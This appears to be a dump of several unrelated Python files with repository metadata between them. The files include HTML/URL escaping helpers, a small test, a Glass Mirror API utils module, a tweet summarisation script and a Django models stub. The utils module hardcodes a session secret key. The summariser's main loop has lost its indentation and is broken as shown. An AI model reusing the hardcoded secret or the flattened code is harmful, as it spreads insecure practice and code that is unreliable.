    # terminated early by a literal "</script>" inside a string value.
    # Some json libraries do this escaping by default; python's stdlib does not.
    # http://stackoverflow.com/questions/1580647/json-why-are-forward-slashes-escaped
    encoded = _json_encode(value)
    return encoded.replace("</", "<\\/")
def json_decode(value):
    """Returns Python objects for the given JSON string.

    Thin wrapper over whichever JSON backend was resolved at import time
    (stdlib json, simplejson, or Django's bundled copy).
    """
    return _json_decode(value)
def squeeze(value):
    """Replace all sequences of whitespace chars with a single space."""
    # \x00-\x20 covers all ASCII control characters plus the space itself.
    collapsed = re.sub(r"[\x00-\x20]+", " ", value)
    return collapsed.strip()
def url_escape(value):
    """Returns a valid URL-encoded version of the given value.

    Python 2 API: UTF-8-encodes via the utf8() helper, then applies
    urllib.quote_plus (spaces become '+').
    """
    return urllib.quote_plus(utf8(value))
def url_unescape(value):
    """Decodes the given value from a URL.

    Python 2 API: applies urllib.unquote_plus ('+' becomes a space), then
    decodes the result to a unicode string via _unicode().
    """
    return _unicode(urllib.unquote_plus(value))
def utf8(value):
    # Python 2 helper: unicode objects are encoded to UTF-8 byte strings;
    # byte strings (str) are asserted and passed through unchanged.
    if isinstance(value, unicode):
        return value.encode("utf-8")
    assert isinstance(value, str)
    return value
# I originally used the regex from
# http://daringfireball.net/2010/07/improved_regex_for_matching_urls
# but it gets all exponential on certain patterns (such as too many trailing
# dots), causing the regex matcher to never return.
# This regex should avoid those problems.
# Group 1 is the whole URL, group 2 the optional scheme, group 3 the slashes
# after the scheme; a bare "www." prefix is also accepted.
_URL_RE = re.compile(ur"""\b((?:([\w-]+):(/{1,3})|www[.])(?:(?:(?:[^\s&()]|&|")*(?:[^!"#$%&'()*+,.:;<=>?@\[\]^`{|}~\s]))|(?:\((?:[^\s&()]|&|")*\)))+)""")
def linkify(text, shorten=False, extra_params="",
            require_protocol=False, permitted_protocols=["http", "https"]):
    """Converts plain text into HTML with links.

    For example: linkify("Hello http://tornadoweb.org!") would return
    Hello <a href="http://tornadoweb.org">http://tornadoweb.org</a>!

    Parameters:
    shorten: Long urls will be shortened for display.
    extra_params: Extra text to include in the link tag,
        e.g. linkify(text, extra_params='rel="nofollow" class="external"')
    require_protocol: Only linkify urls which include a protocol. If this is
        False, urls such as www.facebook.com will also be linkified.
    permitted_protocols: List (or set) of protocols which should be linkified,
        e.g. linkify(text, permitted_protocols=["http", "ftp", "mailto"]).
        It is very unsafe to include protocols such as "javascript".
    """
    if extra_params:
        extra_params = " " + extra_params.strip()
    def make_link(m):
        # Regex substitution callback: m.group(1) is the full URL,
        # m.group(2) the optional protocol, m.group(3) the "://" slashes.
        url = m.group(1)
        proto = m.group(2)
        if require_protocol and not proto:
            return url # not protocol, no linkify
        if proto and proto not in permitted_protocols:
            return url # bad protocol, no linkify
        href = m.group(1)
        if not proto:
            href = "http://" + href # no proto specified, use http
        params = extra_params
        # clip long urls. max_len is just an approximation
        max_len = 30
        if shorten and len(url) > max_len:
            before_clip = url
            if proto:
                proto_len = len(proto) + 1 + len(m.group(3) or "") # +1 for :
            else:
                proto_len = 0
            parts = url[proto_len:].split("/")
            if len(parts) > 1:
                # Grab the whole host part plus the first bit of the path
                # The path is usually not that interesting once shortened
                # (no more slug, etc), so it really just provides a little
                # extra indication of shortening.
                url = url[:proto_len] + parts[0] + "/" + \
                    parts[1][:8].split('?')[0].split('.')[0]
            if len(url) > max_len * 1.5: # still too long
                url = url[:max_len]
            if url != before_clip:
                amp = url.rfind('&')
                # avoid splitting html char entities
                if amp > max_len - 5:
                    url = url[:amp]
                url += "..."
                # if clipping didn't actually save space, keep the original
                if len(url) >= len(before_clip):
                    url = before_clip
            else:
                # full url is visible on mouse-over (for those who don't
                # have a status bar, such as Safari by default)
                params += ' title="%s"' % href
        return u'<a href="%s"%s>%s</a>' % (href, params, url)
    # First HTML-escape so that our strings are all safe.
    # The regex is modified to avoid character entites other than & so
    # that we won't pick up ", etc.
    text = _unicode(xhtml_escape(text))
    return _URL_RE.sub(make_link, text)
def _unicode(value):
    """Coerce *value* to a unicode string.

    UTF-8 byte strings are decoded; unicode passes through untouched.
    """
    if not isinstance(value, str):
        assert isinstance(value, unicode)
        return value
    return value.decode("utf-8")
def _convert_entity(m):
    """Translate one regex-matched HTML entity into its unicode character.

    Unknown entities are returned unchanged in their escaped form.
    """
    entity = m.group(2)
    if m.group(1) == "#":
        # Numeric character reference, e.g. &#65;
        try:
            return unichr(int(entity))
        except ValueError:
            return "&#%s;" % entity
    # Named entity, e.g. &nbsp;
    try:
        return _HTML_UNICODE_MAP[entity]
    except KeyError:
        return "&%s;" % entity
def _build_unicode_map():
    """Build the entity-name -> unicode character table used by _convert_entity."""
    return dict((name, unichr(codepoint))
                for name, codepoint in htmlentitydefs.name2codepoint.iteritems())
_HTML_UNICODE_MAP = _build_unicode_map() | [
"leedeetiger@gmail.com"
] | leedeetiger@gmail.com |
9106a10aff28c894fe165cefa35ee82cd8488822 | b18f92a6a41a3d83e77848460d4a3f17e4fe677a | /introduction_to_python/recursive_functions/1_find_power/solution/test_solution.py | 1a873495b9e68f09bf6e6f09278da0ec62088424 | [] | no_license | ByteAcademyCo/Exercises | de71b885a498ead8296e6107836f9a06ac399d4f | 8332d0473ab35ee1d2975b384afda45c77ef943d | refs/heads/master | 2022-05-25T23:01:59.466480 | 2022-03-14T13:12:10 | 2022-03-14T13:12:10 | 252,842,407 | 1 | 109 | null | 2022-03-14T13:12:11 | 2020-04-03T21:09:47 | Python | UTF-8 | Python | false | false | 167 | py | def test_solution():
from solution import power
assert power(1, 3) == 1
assert power(2, 4) == 16
assert power(0, 1) == 0
assert power(5, 2) == 25
| [
"avelikevitch@gmail.com"
] | avelikevitch@gmail.com |
0d8da4c845c6dfa247dff447bd1179c0d97e47ca | c2d85a7ef18163e4ed6cc0ca8a524aef38ea7e2f | /mirror_api_server/utils.py | a4eb6c1ca95db5693299de1d98f6cc926eaba033 | [
"Apache-2.0"
] | permissive | rajeshvv/mirror-api | 3adc1dfc50ffc97bed0247d12b6042ec0159c28f | 6b6c66a3555fc8155e9fd4df4a3424aa534be2c6 | refs/heads/master | 2021-04-18T20:26:47.302278 | 2013-04-28T20:36:33 | 2013-04-28T20:36:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,193 | py | #!/usr/bin/python
# Copyright (C) 2013 Gerwin Sturm, FoldedSoft e.U.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Configuration options and helper functions for all services"""
__author__ = 'scarygami@gmail.com (Gerwin Sturm)'
import jinja2
import json
import os
import webapp2
from google.appengine.api.app_identity import get_application_id
from google.appengine.ext import ndb
from oauth2client.appengine import CredentialsNDBProperty
from webapp2_extras import sessions
from webapp2_extras.appengine import sessions_memcache
JINJA = jinja2.Environment(loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
appname = get_application_id()
base_url = "https://" + appname + ".appspot.com"
discovery_url = base_url + "/_ah/api"
discovery_service_url = discovery_url + "/discovery/v1/apis/{api}/{apiVersion}/rest"
with open("client_secrets.json", "r") as fh:
CLIENT_ID = json.load(fh)["web"]["client_id"]
# TODO: read session secret from file
SESSION_KEY = "sdjalasjdakjhskdauh3o8h4ofihskjdhfow38fhoaihoa2udjlakj"
config = {}
config["webapp2_extras.sessions"] = {"secret_key": SESSION_KEY}
# Add any additional scopes that you might need for your service to access other Google APIs
COMMON_SCOPES = ["https://www.googleapis.com/auth/plus.login"]
# userinfo.email scope is required to work with Google Cloud Endpoints
TEST_SCOPES = ["https://www.googleapis.com/auth/userinfo.email"]
# Remove the location scope from here if you don't need it
REAL_SCOPES = [
"https://www.googleapis.com/auth/glass.timeline",
"https://www.googleapis.com/auth/glass.location"
]
def createError(code, message):
    """Serialize an error payload as a JSON string for request responses."""
    payload = {"error": {"code": code, "message": message}}
    return json.dumps(payload)
def createMessage(message):
    """Serialize a plain message as a JSON string for request responses."""
    payload = {"message": message}
    return json.dumps(payload)
class BaseHandler(webapp2.RequestHandler):
    """Base request handler to enable session storage for all handlers"""
    def dispatch(self):
        """Wrap normal dispatching so the session store is attached before
        the request runs and all sessions are persisted afterwards."""
        # Get a session store for this request.
        self.session_store = sessions.get_store(request=self.request)
        try:
            # Dispatch the request.
            webapp2.RequestHandler.dispatch(self)
        finally:
            # Save all sessions.
            self.session_store.save_sessions(self.response)
    @webapp2.cached_property
    def session(self):
        """This request's session, memcache-backed; computed once and cached."""
        return self.session_store.get_session(name='mirror_session', factory=sessions_memcache.MemcacheSessionFactory)
class User(ndb.Model):
    """Datastore model to keep all relevant information about a user.

    Properties:
        displayName     Name of the user as returned by the Google+ API
        imageUrl        Avatar image of the user as returned by the Google+ API
        verifyToken     Random token generated for each user to check validity
                        of incoming notifications
        credentials     OAuth2 access and refresh token to be used for requests
                        against the Mirror API
        latitude        Latest recorded latitude of the user
        longitude       Latest recorded longitude of the user
        locationUpdate  DateTime at which the location of the user was last updated
        friends         List of Google+ friend ids, as returned by the Google+ API
    """
    displayName = ndb.StringProperty()
    imageUrl = ndb.StringProperty()
    verifyToken = ndb.StringProperty()
    credentials = CredentialsNDBProperty()
    latitude = ndb.FloatProperty()
    longitude = ndb.FloatProperty()
    locationUpdate = ndb.DateTimeProperty()
    friends = ndb.StringProperty(repeated=True)
class TestUser(User):
    # Marker subclass: identical schema to User, but flagged as a test account.
    _testUser = True
| [
"scarygami@gmail.com"
] | scarygami@gmail.com |
4e3318e59302534710541c49f0e6f88e96b9363b | b775aaa493c3250450be5e573ba02bd2a05b349f | /Text_Summary_thematicFrequency_themes | 06216c3263aed8360a3dcb6679f354c84f9643ba | [] | no_license | rddspatial/text-summarization | 050f2e366fa803fd39a957c72649093d46c775b0 | 50de17c5909958b312a549d55557e3cc5473c4bc | refs/heads/master | 2022-04-21T08:19:31.552362 | 2022-03-28T14:41:29 | 2022-03-28T14:41:29 | 255,176,418 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,787 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 13 12:59:41 2019
@author: Rahul
"""
from geotext import GeoText
from nltk import pos_tag
from nltk.tokenize import word_tokenize, sent_tokenize
from nltk.stem import WordNetLemmatizer
import re
import csv
import spacy # https://spacy.io/usage/spacy-101
import pandas as pd
from nltk.corpus import stopwords
import math
from heapq import nlargest
# Load English tokenizer, tagger, parser, NER and word vectors
nlp = spacy.load("en")
alphabets= "([A-Za-z])"
prefixes = "(Mt|Mr|St|Mrs|Ms|Dr)[.]"
suffixes = "(Inc|Ltd|Jr|Sr|Co)"
starters = "(Mr|Mrs|Ms|Dr|He\s|She\s|It\s|They\s|Their\s|Our\s|We\s|But\s|However\s|That\s|This\s|Wherever)"
acronyms = "([A-Z][.][A-Z][.](?:[A-Z][.])?)"
websites = "[.](com|net|org|io|gov)"
digits = "([0-9])"
def split_into_sentences(text):
    """Split free text into sentences, protecting abbreviations and decimals.

    Strategy: periods that do NOT end a sentence (Mr., Mt., acronyms,
    decimal points, single initials, ...) are temporarily rewritten to the
    marker <prd>; real sentence terminators get a <stop> marker.  The
    replacement order below matters — more specific patterns must run first.
    Returns a list of stripped sentence strings.
    """
    text = " " + text + "  "
    text = text.replace("\n"," ")
    text = re.sub(prefixes,"\\1<prd>",text)
    text = re.sub(websites,"<prd>\\1",text)
    if "Ph.D" in text: text = text.replace("Ph.D.","Ph<prd>D<prd>")
    # BUG FIX: "\s" in a plain string is an invalid escape sequence on
    # Python 3 (DeprecationWarning); use a raw string for the regex piece.
    text = re.sub(r"\s" + alphabets + "[.] "," \\1<prd> ",text)
    text = re.sub(acronyms+" "+starters,"\\1<stop> \\2",text)
    text = re.sub(alphabets + "[.]" + alphabets + "[.]" + alphabets + "[.]","\\1<prd>\\2<prd>\\3<prd>",text)
    text = re.sub(alphabets + "[.]" + alphabets + "[.]","\\1<prd>\\2<prd>",text)
    text = re.sub(" "+suffixes+"[.] "+starters," \\1<stop> \\2",text)
    text = re.sub(" "+suffixes+"[.]"," \\1<prd>",text)
    text = re.sub(" " + alphabets + "[.]"," \\1<prd>",text)
    # Decimal numbers: keep "3.7" together.
    text = re.sub(digits + "[.]" + digits,"\\1<prd>\\2",text)
    # Move terminators that sit inside closing quotes outside of them.
    if "”" in text: text = text.replace(".”","”.")
    if "\"" in text: text = text.replace(".\"","\".")
    if "!" in text: text = text.replace("!\"","\"!")
    if "?" in text: text = text.replace("?\"","\"?")
    text = text.replace(".",".<stop>")
    text = text.replace("?","?<stop>")
    text = text.replace("!","!<stop>")
    text = text.replace("<prd>",".")
    sentences = text.split("<stop>")
    sentences = sentences[:-1]
    sentences = [s.strip() for s in sentences]
    return sentences
def getPlaces(string):
    """Extract a set of lower-cased place names from free text.

    Three complementary strategies are combined per sentence:
      1. spaCy NER entities labelled GPE or LOC,
      2. gazetteer lookup of countries/cities via GeoText,
      3. a POS rule: the run of nouns following a spatial preposition.
    Returns the union of all candidates as a set of lower-cased strings.
    """
    spatial_preposition = ['at', 'in', 'near', 'to', 'on', 'towards', 'toward']
    place_set = set()
    for sent in split_into_sentences(string):
        temp_place_set = set()
        final_temp_place_set = set()
        index = 0
        # 1) spaCy named-entity recognition.
        # BUG FIX: the original called spacy.load('en') for every sentence,
        # reloading the whole model each iteration; reuse the module-level
        # `nlp` pipeline loaded once at import time instead.
        document = nlp(sent)
        for element in document.ents:
            print('Type: %s, Value: %s' % (element.label_, element))
            if (element.label_=='GPE') or (element.label_=='LOC'):
                place_set.add(str(element).lower())
        # 2) Gazetteer lookup of countries and cities in the raw sentence.
        place = GeoText(sent)
        print (sent)
        string = re.sub(r'[^\w\s\.\,\;\?\!]',' ',string)
        # Drop the period from common abbreviations so POS tagging below
        # does not treat them as sentence boundaries.
        sent = sent.replace('Mt.', 'Mt')
        sent = sent.replace('mt.', 'mt')
        sent = sent.replace('St.', 'St')
        sent = sent.replace('st.', 'st')
        for country in place.countries:
            place_set.add(country.lower())
        for city in place.cities:
            place_set.add(city.lower())
        # 3) Rule-based: collect the run of nouns (NNP/NN) that directly
        # follows a spatial preposition, e.g. "in New Delhi".
        word_pos = pos_tag(word_tokenize(sent))
        for entry in word_pos:
            s = ''
            if entry[0].lower() in spatial_preposition:
                for i in range((index+1), len(word_pos)):
                    if (word_pos[i][1]=='NNP') or (word_pos[i][1]=='NN'):
                        s = s + word_pos[i][0] + ' '
                    else:
                        if (len(s) > 0):
                            temp_place_set.add(s.strip())
                        break
            index = index + 1
        # Keep a multi-word candidate whole when it literally occurs in the
        # sentence, otherwise fall back to its individual tokens.
        for entry in temp_place_set:
            result = re.search(entry, sent)
            if result:
                final_temp_place_set.add(entry.lower())
            else:
                for i in word_tokenize(entry):
                    final_temp_place_set.add(i.lower())
        for place in final_temp_place_set:
            place_set.add(place.lower())
    return place_set
def getTimes(string):
    """Return the lower-cased DATE entities spaCy finds in *string*."""
    found = set()
    for entity in nlp(string).ents:
        if entity.label_ != 'DATE':
            continue
        print(entity.text, entity.label_)
        found.add(entity.text.lower())
    return found
def getCasualty(string):
    """Load the casualty/injury lexicon as a set of lemmatized, lower-cased terms.

    The *string* argument is unused; kept for signature parity with callers.
    """
    lemmatizer = WordNetLemmatizer()
    lexicon_path = '/Users/Rahul/Documents/Research/Kiran/lexicon_wordnet_final/def_def_casualty or injury report.csv'
    with open(lexicon_path) as f:
        terms = [line.strip() for line in f]
    return set(lemmatizer.lemmatize(term.lower()) for term in terms)
def getHelp(string):
    """Load the help-calls lexicon as a set of lemmatized, lower-cased terms.

    The *string* argument is unused; kept for signature parity with callers.
    """
    lemmatizer = WordNetLemmatizer()
    lexicon_path = '/Users/Rahul/Documents/Research/Kiran/lexicon_wordnet_final/def_def_helpcalls.csv'
    with open(lexicon_path) as f:
        terms = [line.strip() for line in f]
    return set(lemmatizer.lemmatize(term.lower()) for term in terms)
def getIntensity(string):
    """Load the intensity lexicon as a set of lemmatized, lower-cased terms.

    The *string* argument is unused; kept for signature parity with callers.
    """
    lemmatizer = WordNetLemmatizer()
    lexicon_path = '/Users/Rahul/Documents/Research/Kiran/lexicon_wordnet_final/def_def_intensity.csv'
    with open(lexicon_path) as f:
        terms = [line.strip() for line in f]
    return set(lemmatizer.lemmatize(term.lower()) for term in terms)
def getReport(string):
    """Load the event-report lexicon as a set of lemmatized, lower-cased terms.

    The *string* argument is unused; kept for signature parity with callers.
    """
    lemmatizer = WordNetLemmatizer()
    lexicon_path = '/Users/Rahul/Documents/Research/Kiran/lexicon_wordnet_final/def_def_report the event.csv'
    with open(lexicon_path) as f:
        terms = [line.strip() for line in f]
    return set(lemmatizer.lemmatize(term.lower()) for term in terms)
src = '/Users/Rahul/Documents/Grices maxim/data/Tweet_convo manual data collection_1 to 200_Test_2.csv'
trgt='/Users/Rahul/Documents/Research/Kiran/summary/word_freq_place_theme_2_Test.csv'
df = pd.read_csv(src, sep=',', encoding='ISO-8859-1')
lemmatizer = WordNetLemmatizer()
row_list=list()
for i in range(2):
sentences=list()
test=''
sentences=list()
summary_list=list()
intensity_set_f=set()
help_set_f=set()
report_set_f=set()
casualty_set_f=set()
place_set_f=set()
time_set_f=set()
print (i)
if (i>0):
for conv_id, text in zip(df['Conv ID'], df['Content']):
# print ('c: ',conv_id)
if (conv_id==i):
# print ('text: ',text)
# text=text.lower()
text=text.replace('\x92',' ')
text=text.replace('\x93',' ')
text=text.replace('\x94',' ')
text=text.replace('\x85',' ')
sentences.append(text)
if sentences[-1] != '.':
sentences.append('.')
test = ' '.join(sentences)
stopwordlist = stopwords.words('english')
word_freq = {}
for sent in sent_tokenize(test):
sent=sent.lower()
place_set=getPlaces(sent)
time_set=getTimes(sent)
help_set=getHelp(sent)
intensity_set=getIntensity(sent)
report_set=getReport(sent)
casualty_set=getCasualty(sent)
sent = re.sub(r'[^\w\s]','',sent)
for word in word_tokenize(sent):
word=word.lower()
word_lemma=lemmatizer.lemmatize(word)
if word not in stopwordlist:
if word not in word_freq:
word_freq[word] = 1
else:
word_freq[word] += 1
if word.lower() in place_set and word.lower() in word_freq:
word_freq[word] += 10
place_set_f.add(word)
if word.lower() in place_set and word.lower() not in word_freq:
word_freq[word] = 10
place_set_f.add(word)
if word.lower() in time_set and word.lower() in word_freq:
word_freq[word] += 10
time_set_f.add(word)
if word.lower() in time_set and word.lower() not in word_freq:
word_freq[word] = 10
time_set_f.add(word)
if word_lemma.lower() in intensity_set and word_lemma.lower() in word_freq:
word_freq[word] += 5
intensity_set_f.add(word)
if word_lemma.lower() in intensity_set and word_lemma.lower() not in word_freq:
word_freq[word] = 5
intensity_set_f.add(word)
if word_lemma.lower() in help_set and word_lemma.lower() in word_freq:
word_freq[word] += 10
help_set_f.add(word)
if word_lemma.lower() in help_set and word_lemma.lower() not in word_freq:
word_freq[word] = 10
help_set_f.add(word)
if word_lemma.lower() in report_set and word_lemma.lower() in word_freq:
word_freq[word] += 5
report_set_f.add(word)
if word_lemma.lower() in report_set and word_lemma.lower() not in word_freq:
word_freq[word] = 5
report_set_f.add(word)
if word_lemma.lower() in casualty_set and word_lemma.lower() in word_freq:
word_freq[word] += 5
casualty_set_f.add(word)
if word_lemma.lower() in casualty_set and word_lemma.lower() not in word_freq:
word_freq[word] = 5
casualty_set_f.add(word)
print (word_freq)
print ('SPATIAL THEME SET: ',place_set_f)
print ('TEMPORAL THEME SET: ',time_set_f)
print ('INTENSITY THEME SET: ',intensity_set_f)
print ('HELP THEME SET: ',help_set_f)
print ('REPORT THEME SET: ',report_set_f)
print ('CASUALTY THEME SET: ',casualty_set_f)
num_sent=(sent_tokenize(test))
cutoff=0.3
threshold=int(math.ceil(len(num_sent)*cutoff))
print ('THRESHOLD: ',threshold, ', # of sentences: ',len(num_sent))
maximum_freq = max (word_freq.values())
max_word = max (word_freq, key = lambda key: word_freq[key])
#print ('maximum frequent word is: ',max_word,' with frequency count =', maximum_freq)
top_k = nlargest (2, word_freq, key = word_freq.get)
max_word = str(top_k[0])
max_word_value = word_freq[max_word]
print ('MAX_WORD: ', max_word, ': ', word_freq[max_word])
#print (word_freq[max_word])
for entry in word_freq:
# print (entry, ': ', word_freq[entry], ': ', max_word, ': ', max_word_value)
word_freq[entry] = (word_freq[entry]/max_word_value)
print (word_freq)
sent_freq = {}
for sent in sent_tokenize(test):
sent_score = 0
sent=sent.lower()
# print ('Queried sentence: ',sent)
for word in word_tokenize (sent):
# print ('word scanning: ',word)
if word in word_freq:
# print (word,': ',word_freq[word])
sent_score = sent_score + word_freq[word]
# print (sent_score)
sent_freq[sent] = sent_score
# print (sent,': ',sent_score)
print ('Input text: ', test)
for entry, value in sent_freq.items():
print (entry,': ',value)
top_k = nlargest (threshold, sent_freq, key = sent_freq.get)
print ('Summary: ')
for entry in top_k:
print (entry)
summary_list.append(entry)
summary=' '.join(summary_list)
row=[i,summary]
row_list.append(row)
header = ['Conv_ID','Summary']
with open(trgt, 'wt') as f:
csv_writer = csv.writer(f)
csv_writer.writerow(header)
for record in row_list:
print(record)
csv_writer.writerow(record)
| [
"noreply@github.com"
] | rddspatial.noreply@github.com | |
9f2e315804d79d7b9d92bfa94d7535cb25e69c56 | 11d9e08199ba6be0d86cec0b6ab56e50c8226fff | /case 2/ReadFile.py | 2bae2b489e923fee566ac8452929850632802d55 | [] | no_license | molianlaoda/542_Jiaqi_Chen | 07063689b5451cc8f761e8ed5a44e01b468194ac | e51d9d92dcba893a3d9c67962e23d5b784838cfe | refs/heads/master | 2021-01-15T21:07:27.084110 | 2015-11-27T23:08:56 | 2015-11-27T23:08:56 | 42,687,766 | 0 | 1 | null | 2015-10-27T18:58:35 | 2015-09-17T23:39:36 | Python | UTF-8 | Python | false | false | 752 | py | __author__ = 'jarfy'
class ReadFile(object):
    """Load a comma-separated data file and project selected columns.

    Attributes:
        record: projected rows built by setattributes()
        content: raw rows, each a list of comma-separated fields
        col: column name -> index within a raw row
    """
    def __init__(self):
        self.record = []
        self.content = []
        self.col = {'Name': 0, 'Year': 1, 'Format': 2, 'Genre': 3, 'Director': 4, 'Writer': 5, 'Country': 6, 'Maker': 7}
    def readFile(self, filename):
        """Append each line of *filename* to self.content as a list of fields.

        On a missing/unreadable file, print a message and return without
        touching self.content.  (The original fell through after the except
        clause and crashed with a NameError on the undefined handle.)
        """
        try:
            fhand = open(filename)
        except IOError:
            print('Wrong Address')
            return
        # Close the handle deterministically (the original leaked it).
        with fhand:
            for line in fhand:
                word = line.split(',')
                self.content.append(word)
    def setattributes(self, *attr):
        """For every loaded row, append the concatenation of the named columns to self.record."""
        attr_list = [self.col[att] for att in attr]
        for line in self.content:
            self.record.append(''.join(line[i] for i in attr_list))
'''
test = ReadFile()
test.readFile('data.txt')
''' | [
"molianlaoda@163.com"
] | molianlaoda@163.com |
38c6c0a5f76bb46d4ebbf8c3daefec2159e2a13d | 1b80133706999ec3b21e06ffecd19e28fb2dfbbd | /posts/tests/test_models.py | 47346b3a499bf86c27a022c43e2067eeb9e23a89 | [] | no_license | Fastex007/hw04_tests | 3ab2819bd06395661d5e0c11e36d473d7a9dd519 | 6e9ebc8af6cb51ae62bf17e82359a686eb0d41f7 | refs/heads/master | 2023-02-13T18:14:22.934214 | 2021-01-13T15:45:41 | 2021-01-13T15:45:41 | 325,046,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,870 | py | from posts.lib.MyTestCase import MyTestCase
class PostModelTest(MyTestCase):
    """Unit tests for Post/Group model field metadata and __str__ output."""
    def test_verbose_name_post(self):
        """verbose_name of the field matches the expected value (Post model)."""
        self.assertEqual(
            PostModelTest.test_post._meta.get_field('text').verbose_name,
            'Текст'
        )
    def test_verbose_name_group(self):
        """verbose_name of the field matches the expected value (Group model)."""
        self.assertEqual(
            PostModelTest.test_group._meta.get_field('title').verbose_name,
            'Название'
        )
    def test_help_text_post(self):
        """help_text of the field matches the expected value (Post model)."""
        self.assertEqual(
            PostModelTest.test_post._meta.get_field('text').help_text,
            'Текст публикации'
        )
    def test_help_text_group(self):
        """help_text of the field matches the expected value (Group model)."""
        self.assertEqual(
            PostModelTest.test_group._meta.get_field('title').help_text,
            'Группа, в которой может быть опубликован текст'
        )
    def test_str_post(self):
        """__str__ of the Post model returns the truncated post text."""
        # assertEquals is a deprecated alias; use assertEqual.
        self.assertEqual(PostModelTest.test_post.__str__(),
                         'Тестовый текст,')
    def test_str_group(self):
        """__str__ of the Group model returns the group title."""
        self.assertEqual(PostModelTest.test_group.__str__(),
                         'Тестовая группа')
| [
"fastex007@yandex.ru"
] | fastex007@yandex.ru |
f30006767dcdf9f17324e03f92349b7c526fad62 | 07564c75c1f37f2e0304720d1c01f23a27ef3469 | /273.IntegertoEnglishWords/solution.py | cfa5b45a7acb04c003bd49fbf53a7a34351569ff | [] | no_license | ynXiang/LeetCode | 5e468db560be7f171d7cb24bcd489aa81471349c | 763372587b9ca3f8be4c843427e4760c3e472d6b | refs/heads/master | 2020-05-21T18:27:16.941981 | 2018-01-09T22:17:42 | 2018-01-09T22:17:42 | 84,642,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,439 | py | class Solution(object):
def numberToWords(self, num):
"""
:type num: int
:rtype: str
"""
res = self.helper(num)
return ' '.join(res) if res else 'Zero'
def helper(self, num):
Ones = ['One', 'Two', 'Three', 'Four', 'Five', 'Six', 'Seven', 'Eight', 'Nine', 'Ten', 'Eleven', 'Twelve', 'Thirteen', 'Fourteen', 'Fifteen', 'Sixteen', 'Seventeen', 'Eighteen', 'Nineteen']
Tens = ['Twenty', 'Thirty', 'Forty', 'Fifty', 'Sixty', 'Seventy', 'Eighty', 'Ninety']
Hundreds = ['Hundred', 'Thousand', 'Million', 'Billion']
res = []
if num == 0:
res = []
elif num < 20:
res.append(Ones[num - 1])
elif num < 10**2:
res.append(Tens[num // 10 - 2])
res += self.helper(num % 10)
elif num < 10**3:
res += self.helper(num // 10**2)
res.append(Hundreds[0])
res += self.helper(num % 10**2)
elif num < 10**6:
res += self.helper(num // 10**3)
res.append(Hundreds[1])
res += self.helper(num % 10**3)
elif num < 10**9:
res += self.helper(num // 10**6)
res.append(Hundreds[2])
res += self.helper(num % 10**6)
else:
res += self.helper(num // 10**9)
res.append(Hundreds[3])
res += self.helper(num % 10**9)
return res
| [
"yinan_xiang@163.com"
] | yinan_xiang@163.com |
31d4281eb036da10ee623ed155517ba10365ebef | cfdf3711761fce3dea56a647bb7ef554b08fee1a | /squirrel_2d_localizer/cfg/TwistCorrection.cfg | 9b1972490d03b8975de3de230713b2c09a388468 | [] | no_license | squirrel-project/squirrel_nav | 2d96163cc2bea3437dd2481355049c3d4a2ad31a | bf8ad9ff9f79ab489af82efe37d69716b088b73e | refs/heads/indigo_dev | 2021-03-22T05:18:30.620881 | 2018-04-03T08:13:06 | 2018-04-03T08:13:06 | 19,309,260 | 5 | 12 | null | 2018-04-03T08:13:08 | 2014-04-30T09:51:14 | C++ | UTF-8 | Python | false | false | 821 | cfg | #!/usr/bin/env python
from dynamic_reconfigure.parameter_generator_catkin import *
PACKAGE_NAME = "squirrel_2d_localizer"
gen = ParameterGenerator()
# gen.add(name, type, level, description, default[, min, max])
gen.add("enabled", bool_t, 0, "", True)
# corr_* entries cover the symmetric (x, y, angle) pairs — presumably the
# twist-correction gain matrix; descriptions are empty upstream. TODO confirm.
gen.add("corr_xx", double_t, 0, "", 0.0, 0.0, 100.0)
gen.add("corr_xy", double_t, 0, "", 0.0, 0.0, 100.0)
gen.add("corr_xa", double_t, 0, "", 0.0, 0.0, 100.0)
gen.add("corr_yy", double_t, 0, "", 0.0, 0.0, 100.0)
gen.add("corr_ya", double_t, 0, "", 0.0, 0.0, 100.0)
gen.add("corr_aa", double_t, 0, "", 1.0, 0.0, 100.0)
gen.add("corr_magnitude", double_t, 0, "", 0.001, 0.0, 100.0)
# Smoothing factor constrained to [0, 1].
gen.add("alpha_filter", double_t, 0, "", 0.75, 0.0, 1.0)
# Velocity clamps (units not stated here — presumably m/s and rad/s; confirm).
gen.add("max_lin_vel", double_t, 0, "", 0.5, 0.0, 100.0)
gen.add("max_ang_vel", double_t, 0, "", 0.7, 0.0, 100.0)
exit(gen.generate(PACKAGE_NAME, "squirrel_2d_localizer", "TwistCorrection")) | [
"boniardi@informatik.uni-freiburg.de"
] | boniardi@informatik.uni-freiburg.de |
028c10a04ebb2901f7835a15474fdb02878565aa | f6f2576e54f3c4ff9e46be9e97bfe639e5c495cc | /models.py | 841bedc625d02928fec42e114768af8f29e88ccd | [
"MIT"
] | permissive | mback2k/django-app-comments | 2bd77fbec50fe37eb1dca10b45f76de7c46c23bb | 01ba89bf6c59e908a837a48c92575cc2c9f64d1a | refs/heads/master | 2021-01-17T07:10:07.325462 | 2019-04-27T18:17:27 | 2019-04-27T18:17:27 | 24,798,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,502 | py | # -*- coding: utf-8 -*-
from django.db import models
from django.db.models import Q, signals
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone, html, safestring
from django.dispatch import receiver
import urllib.parse, hashlib, datetime
import threading, bleach
class Author(User):
    """Proxy over the auth User model that adds display helpers."""
    class Meta:
        proxy = True
    @property
    def name(self):
        """Best display name: first name, else the email local part, else username."""
        if self.first_name:
            return self.first_name
        if self.email:
            return self.email.split('@', 2)[0]
        return self.username
    @property
    def avatar(self):
        """Gravatar URL for this author (falls back to the display name when no email)."""
